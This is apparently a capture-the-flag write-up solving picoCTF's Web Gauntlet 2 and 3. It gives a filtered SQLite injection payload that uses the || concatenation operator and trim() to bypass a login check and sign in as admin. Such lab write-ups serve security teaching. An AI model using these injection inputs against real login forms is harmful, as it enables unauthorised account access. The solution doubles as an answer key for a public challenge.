HomePlaygroundOSCPBuy Me a Flag 🚩

Web Gauntlet (170 + 300)

Filtered SQLite injection

Problem

Web Gauntlet 2

This website looks familiar... Log in as admin

Site: http://mercury.picoctf.net:35178/

Filter: http://mercury.picoctf.net:35178/filter.php

Web Gauntlet 3

Last time, I promise! Only 25 characters this time.

Solution

Web Gauntlet 2

Username: adm' || trim('in', Password: ) || '

This will cause the following SQL statement to be executed:

SELECT username, password FROM users WHERE username='adm' || trim('in',' AND password=') || ''

Notes:

  • || is the SQLite concatenation operator.

  • trim(string, character) will remove character from string. Here, it is simply for us to ignore the AND condition by treating ' AND password=' as a string. Since ' AND password=' does not appear in 'in', trim('in',' AND password=') will simply return 'in'.

  • The above SQL statement is thus equivalent to:

SELECT username, password FROM users WHERE username='adm' || 'in' || ''

Which is equivalent to:

SELECT username, password FROM users WHERE username='admin'

We can now check out the filter page:

Web Gauntlet 3

The length requirement is down from 35 characters to 25 characters. Our above solution works for this challenge as well!

PreviousX marks the spot (250)NextEasy Peasy (40)

Last updated